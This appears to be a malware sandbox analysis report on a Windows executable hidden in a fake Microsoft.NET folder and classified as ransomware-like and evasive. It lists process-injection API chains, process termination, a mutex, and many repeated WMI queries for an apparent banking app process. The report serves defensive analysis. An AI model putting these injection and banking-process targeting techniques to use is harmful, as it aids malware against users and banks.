Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180051B00		7_2_0000000180051B00
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180057BA8		7_2_0000000180057BA8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180023BF0		7_2_0000000180023BF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180054C70		7_2_0000000180054C70
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018004CC9C		7_2_000000018004CC9C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018000FCA0		7_2_000000018000FCA0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180026CE0		7_2_0000000180026CE0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_00000001800569C8		7_2_00000001800569C8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018001AD30		7_2_000000018001AD30
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180046D5C		7_2_0000000180046D5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018001DE80		7_2_000000018001DE80
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002AE90		7_2_000000018002AE90
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018002CEC0		7_2_000000018002CEC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180011EC0		7_2_0000000180011EC0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180058F58		7_2_0000000180058F58
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180006FB0		7_2_0000000180006FB0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180023FC0		7_2_0000000180023FC0

Source: Joe Sandbox View

Dropped File: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy) 625BB2074498952E01A21C2D54B9B9A4C0841F743E038799B907126980A984BE

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 000000018003B5A0 appears 52 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 000000018001C5F0 appears 188 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 000000018004EDF8 appears 60 times
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: String function: 0000000180038AAC appears 36 times

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: Number of sections : 15 > 10

Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C00022A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClassicIE.exe< vs leg#U00edvel9931-009-140.08372236.exe
Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1983581967.000000C000246000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClassicIE.exe< vs leg#U00edvel9931-009-140.08372236.exe

Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /19 ZLIB complexity 0.9993620227146043
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /32 ZLIB complexity 0.996083361037234
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /65 ZLIB complexity 0.9993609298945376
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Section: /78 ZLIB complexity 0.9931351902173913

Source: 8pIuMUYQX9q.exe, 00000006.00000002.4145963977.0000000002205000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: indowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBpD!

Source: classification engine

Classification label: mal64.rans.evad.winEXE@6/6@1/1

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A1000 LoadLibraryW,GetProcAddress,FreeLibrary,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,CoUninitialize,CoInitialize,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,?DllLogToFile@@YAXPEB_W0ZZ,GetWindowThreadProcessId,OpenProcess,IsWow64Process,CloseHandle,GetModuleFileNameW,PathRemoveFileSpecW,PathAppendW,CreateProcessW,CloseHandle,CloseHandle,?DllLogToFile@@YAXPEB_W0ZZ,FindWindowExW,?DllLogToFile@@YAXPEB_W0ZZ,RegisterWindowMessageW,SendMessageW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleW,OpenProcess,GetModuleFileNameW,VirtualAllocEx,WriteProcessMemory,GetModuleHandleW,GetProcAddress,CreateRemoteThread,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,

6_2_00007FF6B40A1000

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180005290 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,

6_2_0000000180005290

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00000001800143F0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,_invalid_parameter_noinfo_noreturn,

6_2_00000001800143F0

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

File created: C:\Users\user\Microsoft.NET

Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Mutant created: \Sessions\1\BaseNamedObjects\ManagerServiceAppMU
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
